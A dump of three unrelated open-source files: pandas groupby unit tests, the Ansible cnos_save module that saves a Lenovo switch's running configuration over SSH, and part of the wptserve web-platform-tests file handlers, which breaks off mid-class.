expected = df.groupby('key')['value'].apply(lambda x: x.cumprod())
expected.name = 'value'
tm.assert_series_equal(actual, expected)
def test_ops_general():
ops = [('mean', np.mean),
('median', np.median),
('std', np.std),
('var', np.var),
('sum', np.sum),
('prod', np.prod),
('min', np.min),
('max', np.max),
('first', lambda x: x.iloc[0]),
('last', lambda x: x.iloc[-1]),
('count', np.size), ]
try:
from scipy.stats import sem
except ImportError:
pass
else:
ops.append(('sem', sem))
df = DataFrame(np.random.randn(1000))
labels = np.random.randint(0, 50, size=1000).astype(float)
for op, targop in ops:
result = getattr(df.groupby(labels), op)().astype(float)
expected = df.groupby(labels).agg(targop)
try:
tm.assert_frame_equal(result, expected)
except BaseException as exc:
exc.args += ('operation: %s' % op, )
raise
def test_max_nan_bug():
raw = """,Date,app,File
-04-23,2013-04-23 00:00:00,,log080001.log
-05-06,2013-05-06 00:00:00,,log.log
-05-07,2013-05-07 00:00:00,OE,xlsx"""
df = pd.read_csv(compat.StringIO(raw), parse_dates=[0])
gb = df.groupby('Date')
r = gb[['File']].max()
e = gb['File'].max().to_frame()
tm.assert_frame_equal(r, e)
assert not r['File'].isna().any()
def test_nlargest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list('a' * 5 + 'b' * 5))
gb = a.groupby(b)
r = gb.nlargest(3)
e = Series([
7, 5, 3, 10, 9, 6
], index=MultiIndex.from_arrays([list('aaabbb'), [3, 2, 1, 9, 5, 8]]))
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series([
3, 2, 1, 3, 3, 2
], index=MultiIndex.from_arrays([list('aaabbb'), [2, 3, 1, 6, 5, 7]]))
tm.assert_series_equal(gb.nlargest(3, keep='last'), e)
def test_nsmallest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list('a' * 5 + 'b' * 5))
gb = a.groupby(b)
r = gb.nsmallest(3)
e = Series([
1, 2, 3, 0, 4, 6
], index=MultiIndex.from_arrays([list('aaabbb'), [0, 4, 1, 6, 7, 8]]))
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series([
0, 1, 1, 0, 1, 2
], index=MultiIndex.from_arrays([list('aaabbb'), [4, 1, 0, 9, 8, 7]]))
tm.assert_series_equal(gb.nsmallest(3, keep='last'), e)
@pytest.mark.parametrize("func", [
'mean', 'var', 'std', 'cumprod', 'cumsum'
])
def test_numpy_compat(func):
# see gh-12811
df = pd.DataFrame({'A': [1, 2, 1], 'B': [1, 2, 3]})
g = df.groupby('A')
msg = "numpy operations are not valid with groupby"
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(1, 2, 3)
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(foo=1)
def test_cummin_cummax():
# GH 15048
num_types = [np.int32, np.int64, np.float32, np.float64]
num_mins = [np.iinfo(np.int32).min, np.iinfo(np.int64).min,
np.finfo(np.float32).min, np.finfo(np.float64).min]
num_max = [np.iinfo(np.int32).max, np.iinfo(np.int64).max,
np.finfo(np.float32).max, np.finfo(np.float64).max]
base_df = pd.DataFrame({'A': [1, 1, 1, 1, 2, 2, 2, 2],
'B': [3, 4, 3, 2, 2, 3, 2, 1]})
expected_mins = [3, 3, 3, 2, 2, 2, 2, 1]
expected_maxs = [3, 4, 4, 4, 2, 3, 3, 3]
for dtype, min_val, max_val in zip(num_types, num_mins, num_max):
df = base_df.astype(dtype)
# cummin
expected = pd.DataFrame({'B': expected_mins}).astype(dtype)
result = df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
result = df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test cummin w/ min value for dtype
df.loc[[2, 6], 'B'] = min_val
expected.loc[[2, 3, 6, 7], 'B'] = min_val
result = df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
expected = df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# cummax
expected = pd.DataFrame({'B': expected_maxs}).astype(dtype)
result = df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
result = df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test cummax w/ max value for dtype
df.loc[[2, 6], 'B'] = max_val
expected.loc[[2, 3, 6, 7], 'B'] = max_val
result = df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
expected = df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], 'B'] = np.nan
expected = pd.DataFrame({'B': [np.nan, 4, np.nan, 2,
np.nan, 3, np.nan, 1]})
result = base_df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
expected = (base_df.groupby('A')
.B
.apply(lambda x: x.cummin())
.to_frame())
tm.assert_frame_equal(result, expected)
expected = pd.DataFrame({'B': [np.nan, 4, np.nan, 4,
np.nan, 3, np.nan, 3]})
result = base_df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
expected = (base_df.groupby('A')
.B
.apply(lambda x: x.cummax())
.to_frame())
tm.assert_frame_equal(result, expected)
# Test nan in entire column
base_df['B'] = np.nan
expected = pd.DataFrame({'B': [np.nan] * 8})
result = base_df.groupby('A').cummin()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').cummax()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(expected, result)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(['2001'])))
expected = pd.Series(pd.to_datetime('2001'), index=[0], name='b')
for method in ['cummax', 'cummin']:
result = getattr(df.groupby('a')['b'], method)()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[2, 1, 1]))
result = df.groupby('a').b.cummax()
expected = pd.Series([2, 1, 2], name='b')
tm.assert_series_equal(result, expected)
df = pd.DataFrame(dict(a=[1, 2, 1], b=[1, 2, 2]))
result = df.groupby('a').b.cummin()
expected = pd.Series([1, 2, 1], name='b')
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('in_vals, out_vals', [
# Basics: strictly increasing (T), strictly decreasing (F),
# abs val increasing (F), non-strictly increasing (T)
([1, 2, 5, 3, 2, 0, 4, 5, -6, 1, 1],
[True, False, False, True]),
# Test with inf vals
([1, 2.1, np.inf, 3, 2, np.inf, -np.inf, 5, 11, 1, -np.inf],
[True, False, True, False]),
# Test with nan vals; should always be False
([1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False]),
])
def test_is_monotonic_increasing(in_vals, out_vals):
# GH 17015
source_dict = {
'A': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'],
'B': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c', 'd', 'd'],
'C': in_vals}
df = pd.DataFrame(source_dict)
result = df.groupby('B').C.is_monotonic_increasing
index = Index(list('abcd'), name='B')
expected = pd.Series(index=index, data=out_vals, name='C')
tm.assert_series_equal(result, expected)
# Also check result equal to manually taking x.is_monotonic_increasing.
expected = (
df.groupby(['B']).C.apply(lambda x: x.is_monotonic_increasing))
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('in_vals, out_vals', [
# Basics: strictly decreasing (T), strictly increasing (F),
# abs val decreasing (F), non-strictly increasing (T)
([10, 9, 7, 3, 4, 5, -3, 2, 0, 1, 1],
[True, False, False, True]),
# Test with inf vals
([np.inf, 1, -np.inf, np.inf, 2, -3, -np.inf, 5, -3, -np.inf, -np.inf],
[True, True, False, True]),
# Test with nan vals; should always be False
([1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False]),
])
def test_is_monotonic_decreasing(in_vals, out_vals):
# GH 17015
source_dict = {
'A': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'],
'B': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c', 'd', 'd'],
'C': in_vals}
df = pd.DataFrame(source_dict)
result = df.groupby('B').C.is_monotonic_decreasing
index = Index(list('abcd'), name='B')
expected = pd.Series(index=index, data=out_vals, name='C')
tm.assert_series_equal(result, expected)
# describe
# --------------------------------
def test_apply_describe_bug(mframe):
grouped = mframe.groupby(level='first')
grouped.describe() # it works!
def test_series_describe_multikey():
ts = tm.makeTimeSeries()
grouped = ts.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
tm.assert_series_equal(result['mean'], grouped.mean(),
check_names=False)
tm.assert_series_equal(result['std'], grouped.std(), check_names=False)
tm.assert_series_equal(result['min'], grouped.min(), check_names=False)
def test_series_describe_single():
ts = tm.makeTimeSeries()
grouped = ts.groupby(lambda x: x.month)
result = grouped.apply(lambda x: x.describe())
expected = grouped.describe().stack()
tm.assert_series_equal(result, expected)
def test_series_index_name(df):
grouped = df.loc[:, ['C']].groupby(df['A'])
result = grouped.agg(lambda x: x.mean())
assert result.index.name == 'A'
def test_frame_describe_multikey(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
desc_groups = []
for col in tsframe:
group = grouped[col].describe()
# GH 17464 - Remove duplicate MultiIndex levels
group_col = pd.MultiIndex(
levels=[[col], group.columns],
codes=[[0] * len(group.columns), range(len(group.columns))])
group = pd.DataFrame(group.values,
columns=group_col,
index=group.index)
desc_groups.append(group)
expected = pd.concat(desc_groups, axis=1)
tm.assert_frame_equal(result, expected)
groupedT = tsframe.groupby({'A': 0, 'B': 0,
'C': 1, 'D': 1}, axis=1)
result = groupedT.describe()
expected = tsframe.describe().T
expected.index = pd.MultiIndex(
levels=[[0, 1], expected.index],
codes=[[0, 0, 1, 1], range(len(expected.index))])
tm.assert_frame_equal(result, expected)
def test_frame_describe_tupleindex():
# GH 14848 - regression from 0.19.0 to 0.19.1
df1 = DataFrame({'x': [1, 2, 3, 4, 5] * 3,
'y': [10, 20, 30, 40, 50] * 3,
'z': [100, 200, 300, 400, 500] * 3})
df1['k'] = [(0, 0, 1), (0, 1, 0), (1, 0, 0)] * 5
df2 = df1.rename(columns={'k': 'key'})
msg = "Names should be list-like for a MultiIndex"
with pytest.raises(ValueError, match=msg):
df1.groupby('k').describe()
with pytest.raises(ValueError, match=msg):
df2.groupby('key').describe()
def test_frame_describe_unstacked_format():
# GH 4792
prices = {pd.Timestamp('2011-01-06 10:59:05', tz=None): 24990,
pd.Timestamp('2011-01-06 12:43:33', tz=None): 25499,
pd.Timestamp('2011-01-06 12:54:09', tz=None): 25499}
volumes = {pd.Timestamp('2011-01-06 10:59:05', tz=None): 1500000000,
pd.Timestamp('2011-01-06 12:43:33', tz=None): 5000000000,
pd.Timestamp('2011-01-06 12:54:09', tz=None): 100000000}
df = pd.DataFrame({'PRICE': prices,
'VOLUME': volumes})
result = df.groupby('PRICE').VOLUME.describe()
data = [df[df.PRICE == 24990].VOLUME.describe().values.tolist(),
df[df.PRICE == 25499].VOLUME.describe().values.tolist()]
expected = pd.DataFrame(data,
index=pd.Index([24990, 25499], name='PRICE'),
columns=['count', 'mean', 'std', 'min',
'25%', '50%', '75%', 'max'])
tm.assert_frame_equal(result, expected)
# nunique
# --------------------------------
@pytest.mark.parametrize('n', 10 ** np.arange(2, 6))
@pytest.mark.parametrize('m', [10, 100, 1000])
@pytest.mark.parametrize('sort', [False, True])
@pytest.mark.parametrize('dropna', [False, True])
def test_series_groupby_nunique(n, m, sort, dropna):
def check_nunique(df, keys, as_index=True):
gr = df.groupby(keys, as_index=as_index, sort=sort)
left = gr['julie'].nunique(dropna=dropna)
gr = df.groupby(keys, as_index=as_index, sort=sort)
right = gr['julie'].apply(Series.nunique, dropna=dropna)
if not as_index:
right = right.reset_index(drop=True)
tm.assert_series_equal(left, right, check_names=False)
days = date_range('2015-08-23', periods=10)
frame = DataFrame({'jim': np.random.choice(list(ascii_lowercase), n),
'joe': np.random.choice(days, n),
'julie': np.random.randint(0, m, n)})
check_nunique(frame, ['jim'])
check_nunique(frame, ['jim', 'joe'])
frame.loc[1::17, 'jim'] = None
frame.loc[3::37, 'joe'] = None
frame.loc[7::19, 'julie'] = None
frame.loc[8::19, 'julie'] = None
frame.loc[9::19, 'julie'] = None
check_nunique(frame, ['jim'])
check_nunique(frame, ['jim', 'joe'])
check_nunique(frame, ['jim'], as_index=False)
check_nunique(frame, ['jim', 'joe'], as_index=False)
def test_nunique():
df = DataFrame({
'A': list('abbacc'),
'B': list('abxacc'),
'C': list('abbacx'),
})
expected = DataFrame({'A': [1] * 3, 'B': [1, 2, 1], 'C': [1, 1, 2]})
result = df.groupby('A', as_index=False).nunique()
tm.assert_frame_equal(result, expected)
# as_index
expected.index = list('abc')
expected.index.name = 'A'
result = df.groupby('A').nunique()
tm.assert_frame_equal(result, expected)
# with na
result = df.replace({'x': None}).groupby('A').nunique(dropna=False)
tm.assert_frame_equal(result, expected)
# dropna
expected = DataFrame({'A': [1] * 3, 'B': [1] * 3, 'C': [1] * 3},
index=list('abc'))
expected.index.name = 'A'
result = df.replace({'x': None}).groupby('A').nunique()
tm.assert_frame_equal(result, expected)
def test_nunique_with_object():
# GH 11077
data = pd.DataFrame(
[[100, 1, 'Alice'],
[200, 2, 'Bob'],
[300, 3, 'Charlie'],
[-400, 4, 'Dan'],
[500, 5, 'Edith']],
columns=['amount', 'id', 'name']
)
result = data.groupby(['id', 'amount'])['name'].nunique()
index = MultiIndex.from_arrays([data.id, data.amount])
expected = pd.Series([1] * 5, name='name', index=index)
tm.assert_series_equal(result, expected)
def test_nunique_with_empty_series():
# GH 12553
data = pd.Series(name='name')
result = data.groupby(level=0).nunique()
expected = pd.Series(name='name', dtype='int64')
tm.assert_series_equal(result, expected)
def test_nunique_with_timegrouper():
# GH 13453
test = pd.DataFrame({
'time': [Timestamp('2016-06-28 09:35:35'),
Timestamp('2016-06-28 16:09:30'),
Timestamp('2016-06-28 16:46:28')],
'data': ['1', '2', '3']}).set_index('time')
result = test.groupby(pd.Grouper(freq='h'))['data'].nunique()
expected = test.groupby(
pd.Grouper(freq='h')
)['data'].apply(pd.Series.nunique)
tm.assert_series_equal(result, expected)
# count
# --------------------------------
def test_groupby_timedelta_cython_count():
df = DataFrame({'g': list('ab' * 2),
'delt': np.arange(4).astype('timedelta64[ns]')})
expected = Series([
2, 2
], index=pd.Index(['a', 'b'], name='g'), name='delt')
result = df.groupby('g').delt.count()
tm.assert_series_equal(expected, result)
def test_count():
n = 1 << 15
dr = date_range('2015-08-30', periods=n // 10, freq='T')
df = DataFrame({
'1st': np.random.choice(
list(ascii_lowercase), n),
'2nd': np.random.randint(0, 5, n),
'3rd': np.random.randn(n).round(3),
'4th': np.random.randint(-10, 10, n),
'5th': np.random.choice(dr, n),
'6th': np.random.randn(n).round(3),
'7th': np.random.randn(n).round(3),
'8th': np.random.choice(dr, n) - np.random.choice(dr, 1),
'9th': np.random.choice(
list(ascii_lowercase), n)
})
for col in df.columns.drop(['1st', '2nd', '4th']):
df.loc[np.random.choice(n, n // 10), col] = np.nan
df['9th'] = df['9th'].astype('category')
for key in '1st', '2nd', ['1st', '2nd']:
left = df.groupby(key).count()
right = df.groupby(key).apply(DataFrame.count).drop(key, axis=1)
tm.assert_frame_equal(left, right)
# GH5610
# count counts non-nulls
df = pd.DataFrame([[1, 2, 'foo'],
[1, np.nan, 'bar'],
[3, np.nan, np.nan]],
columns=['A', 'B', 'C'])
count_as = df.groupby('A').count()
count_not_as = df.groupby('A', as_index=False).count()
expected = DataFrame([[1, 2], [0, 0]], columns=['B', 'C'],
index=[1, 3])
expected.index.name = 'A'
tm.assert_frame_equal(count_not_as, expected.reset_index())
tm.assert_frame_equal(count_as, expected)
count_B = df.groupby('A')['B'].count()
tm.assert_series_equal(count_B, expected['B'])
def test_count_object():
df = pd.DataFrame({'a': ['a'] * 3 + ['b'] * 3, 'c': [2] * 3 + [3] * 3})
result = df.groupby('c').a.count()
expected = pd.Series([
3, 3
], index=pd.Index([2, 3], name='c'), name='a')
tm.assert_series_equal(result, expected)
df = pd.DataFrame({'a': ['a', np.nan, np.nan] + ['b'] * 3,
'c': [2] * 3 + [3] * 3})
result = df.groupby('c').a.count()
expected = pd.Series([
1, 3
], index=pd.Index([2, 3], name='c'), name='a')
tm.assert_series_equal(result, expected)
def test_count_cross_type():
# GH8169
vals = np.hstack((np.random.randint(0, 5, (100, 2)), np.random.randint(
0, 2, (100, 2))))
df = pd.DataFrame(vals, columns=['a', 'b', 'c', 'd'])
df[df == 2] = np.nan
expected = df.groupby(['c', 'd']).count()
for t in ['float32', 'object']:
df['a'] = df['a'].astype(t)
df['b'] = df['b'].astype(t)
result = df.groupby(['c', 'd']).count()
tm.assert_frame_equal(result, expected)
def test_lower_int_prec_count():
df = DataFrame({'a': np.array(
[0, 1, 2, 100], np.int8),
'b': np.array(
[1, 2, 3, 6], np.uint32),
'c': np.array(
[4, 5, 6, 8], np.int16),
'grp': list('ab' * 2)})
result = df.groupby('grp').count()
expected = DataFrame({'a': [2, 2],
'b': [2, 2],
'c': [2, 2]}, index=pd.Index(list('ab'),
name='grp'))
tm.assert_frame_equal(result, expected)
def test_count_uses_size_on_exception():
class RaisingObjectException(Exception):
pass
class RaisingObject(object):
def __init__(self, msg='I will raise inside Cython'):
super(RaisingObject, self).__init__()
self.msg = msg
def __eq__(self, other):
# gets called in Cython to check that raising calls the method
raise RaisingObjectException(self.msg)
df = DataFrame({'a': [RaisingObject() for _ in range(4)],
'grp': list('ab' * 2)})
result = df.groupby('grp').count()
expected = DataFrame({'a': [2, 2]}, index=pd.Index(
list('ab'), name='grp'))
tm.assert_frame_equal(result, expected)
# size
# --------------------------------
def test_size(df):
grouped = df.groupby(['A', 'B'])
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
grouped = df.groupby('A')
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
grouped = df.groupby('B')
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
df = DataFrame(np.random.choice(20, (1000, 3)), columns=list('abc'))
for sort, key in cart_product((False, True), ('a', 'b', ['a', 'b'])):
left = df.groupby(key, sort=sort).size()
right = df.groupby(key, sort=sort)['c'].apply(lambda a: a.shape[0])
tm.assert_series_equal(left, right, check_names=False)
# GH11699
df = DataFrame([], columns=['A', 'B'])
out = Series([], dtype='int64', index=Index([], name='A'))
tm.assert_series_equal(df.groupby('A').size(), out)
# pipe
# --------------------------------
def test_pipe():
# Test the pipe method of DataFrameGroupBy.
# Issue #17871
random_state = np.random.RandomState(1234567890)
df = DataFrame({'A': ['foo', 'bar', 'foo', 'bar',
'foo', 'bar', 'foo', 'foo'],
'B': random_state.randn(8),
'C': random_state.randn(8)})
def f(dfgb):
return dfgb.B.max() - dfgb.C.min().min()
def square(srs):
return srs ** 2
# Note that the transformations are
# GroupBy -> Series
# Series -> Series
# This then chains the GroupBy.pipe and the
# NDFrame.pipe methods
result = df.groupby('A').pipe(f).pipe(square)
index = Index([u'bar', u'foo'], dtype='object', name=u'A')
expected = pd.Series([8.99110003361, 8.17516964785], name='B',
index=index)
tm.assert_series_equal(expected, result)
def test_pipe_args():
# Test passing args to the pipe method of DataFrameGroupBy.
# Issue #17871
df = pd.DataFrame({'group': ['A', 'A', 'B', 'B', 'C'],
'x': [1.0, 2.0, 3.0, 2.0, 5.0],
'y': [10.0, 100.0, 1000.0, -100.0, -1000.0]})
def f(dfgb, arg1):
return (dfgb.filter(lambda grp: grp.y.mean() > arg1, dropna=False)
.groupby(dfgb.grouper))
def g(dfgb, arg2):
return dfgb.sum() / dfgb.sum().sum() + arg2
def h(df, arg3):
return df.x + df.y - arg3
result = (df
.groupby('group')
.pipe(f, 0)
.pipe(g, 10)
.pipe(h, 100))
# Assert the results here
index = pd.Index(['A', 'B', 'C'], name='group')
expected = pd.Series([-79.5160891089, -78.4839108911, -80],
index=index)
tm.assert_series_equal(expected, result)
# test SeriesGroupby.pipe
ser = pd.Series([1, 1, 2, 2, 3, 3])
result = ser.groupby(ser).pipe(lambda grp: grp.sum() * grp.count())
expected = pd.Series([4, 8, 12], index=pd.Int64Index([1, 2, 3]))
tm.assert_series_equal(result, expected)
def test_groupby_mean_no_overflow():
# Regression test for (#22487)
df = pd.DataFrame({
"user": ["A", "A", "A", "A", "A"],
"connections": [4970, 4749, 4719, 4704, 18446744073699999744]
})
assert df.groupby('user')['connections'].mean()['A'] == 3689348814740003840
| bsd-3-clause |
HuaweiSwitch/ansible | lib/ansible/modules/network/lenovo/cnos_save.py | 59 | 5059 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to save running config to start up config to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_save
author: "Dave Kasberg (@dkasberg)"
short_description: Save the running configuration as the startup configuration on devices running Lenovo CNOS
description:
- This module allows you to copy the running configuration of a switch over its startup configuration.
It is recommended to use this module shortly after any major configuration changes so they persist after
a switch restart. This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
that must be created by the user in their local directory to where the playbook is run.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_save.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_save. These are written in the main.yml file of the tasks directory.
---
- name: Test Save
cnos_save:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_save_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Running Config is Saved to Startup Config"
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save memory \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Running Config is Saved to Startup Config ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| gpl-3.0 |
DDEFISHER/servo | tests/wpt/web-platform-tests/tools/wptserve/wptserve/handlers.py | 44 | 13193 | import cgi
import json
import os
import traceback
import urllib
import urlparse
from constants import content_types
from pipes import Pipeline, template
from ranges import RangeParser
from request import Authentication
from response import MultipartContent
from utils import HTTPException
__all__ = ["file_handler", "python_script_handler",
"FunctionHandler", "handler", "json_handler",
"as_is_handler", "ErrorHandler", "BasicAuthHandler"]
def guess_content_type(path):
ext = os.path.splitext(path)[1].lstrip(".")
if ext in content_types:
return content_types[ext]
return "application/octet-stream"
def filesystem_path(base_path, request, url_base="/"):
if base_path is None:
base_path = request.doc_root
path = urllib.unquote(request.url_parts.path)
if path.startswith(url_base):
path = path[len(url_base):]
if ".." in path:
raise HTTPException(404)
new_path = os.path.join(base_path, path)
# Otherwise setting path to / allows access outside the root directory
if not new_path.startswith(base_path):
raise HTTPException(404)
return new_path
class DirectoryHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __repr__(self):
return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
if not request.url_parts.path.endswith("/"):
raise HTTPException(404)
path = filesystem_path(self.base_path, request, self.url_base)
if not os.path.isdir(path):
raise HTTPException(404, "%s is not a directory" % path)
response.headers = [("Content-Type", "text/html")]
response.content = """<!doctype html>
<meta name="viewport" content="width=device-width">
<title>Directory listing for %(path)s</title>
<h1>Directory listing for %(path)s</h1>
<ul>
%(items)s
</ul>
""" % {"path": cgi.escape(request.url_parts.path),
"items": "\n".join(self.list_items(request, path))}
def list_items(self, request, path):
# TODO: this won't actually list all routes, only the
# ones that correspond to a real filesystem path. It's
# not possible to list every route that will match
# something, but it should be possible to at least list the
# statically defined ones
base_path = request.url_parts.path
if not base_path.endswith("/"):
base_path += "/"
if base_path != "/":
link = urlparse.urljoin(base_path, "..")
yield ("""<li class="dir"><a href="%(link)s">%(name)s</a></li>""" %
{"link": link, "name": ".."})
for item in sorted(os.listdir(path)):
link = cgi.escape(urllib.quote(item))
if os.path.isdir(os.path.join(path, item)):
link += "/"
class_ = "dir"
else:
class_ = "file"
yield ("""<li class="%(class)s"><a href="%(link)s">%(name)s</a></li>""" %
{"link": link, "name": cgi.escape(item), "class": class_})
directory_handler = DirectoryHandler()
class FileHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.directory_handler = DirectoryHandler(self.base_path, self.url_base)
def __repr__(self):
return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
if os.path.isdir(path):
return self.directory_handler(request, response)
try:
#This is probably racy with some other process trying to change the file
file_size = os.stat(path).st_size
response.headers.update(self.get_headers(request, path))
if "Range" in request.headers:
try:
byte_ranges = RangeParser()(request.headers['Range'], file_size)
except HTTPException as e:
if e.code == 416:
response.headers.set("Content-Range", "bytes */%i" % file_size)
raise
else:
byte_ranges = None
data = self.get_data(response, path, byte_ranges)
response.content = data
query = urlparse.parse_qs(request.url_parts.query)
pipeline = None
if "pipe" in query:
pipeline = Pipeline(query["pipe"][-1])
elif os.path.splitext(path)[0].endswith(".sub"):
ml_extensions = {".html", ".htm", ".xht", ".xhtml", ".xml", ".svg"}
escape_type = "html" if os.path.splitext(path)[1] in ml_extensions else "none"
pipeline = Pipeline("sub(%s)" % escape_type)
if pipeline is not None:
response = pipeline(request, response)
return response
except (OSError, IOError):
raise HTTPException(404)
def get_headers(self, request, path):
rv = self.default_headers(path)
rv.extend(self.load_headers(request, os.path.join(os.path.split(path)[0], "__dir__")))
rv.extend(self.load_headers(request, path))
return rv
def load_headers(self, request, path):
headers_path = path + ".sub.headers"
if os.path.exists(headers_path):
use_sub = True
else:
headers_path = path + ".headers"
use_sub = False
try:
with open(headers_path) as headers_file:
data = headers_file.read()
except IOError:
return []
else:
if use_sub:
data = template(request, data, escape_type="none")
return [tuple(item.strip() for item in line.split(":", 1))
for line in data.splitlines() if line]
def get_data(self, response, path, byte_ranges):
"""Return either the handle to a file, or a string containing
the content of a chunk of the file, if we have a range request."""
if byte_ranges is None:
return open(path, 'rb')
else:
with open(path, 'rb') as f:
response.status = 206
if len(byte_ranges) > 1:
parts_content_type, content = self.set_response_multipart(response,
byte_ranges,
f)
for byte_range in byte_ranges:
content.append_part(self.get_range_data(f, byte_range),
parts_content_type,
[("Content-Range", byte_range.header_value())])
return content
else:
response.headers.set("Content-Range", byte_ranges[0].header_value())
return self.get_range_data(f, byte_ranges[0])
def set_response_multipart(self, response, ranges, f):
parts_content_type = response.headers.get("Content-Type")
if parts_content_type:
parts_content_type = parts_content_type[-1]
else:
parts_content_type = None
content = MultipartContent()
response.headers.set("Content-Type", "multipart/byteranges; boundary=%s" % content.boundary)
return parts_content_type, content
def get_range_data(self, f, byte_range):
f.seek(byte_range.lower)
return f.read(byte_range.upper - byte_range.lower)
def default_headers(self, path):
return [("Content-Type", guess_content_type(path))]
file_handler = FileHandler()
class PythonScriptHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __repr__(self):
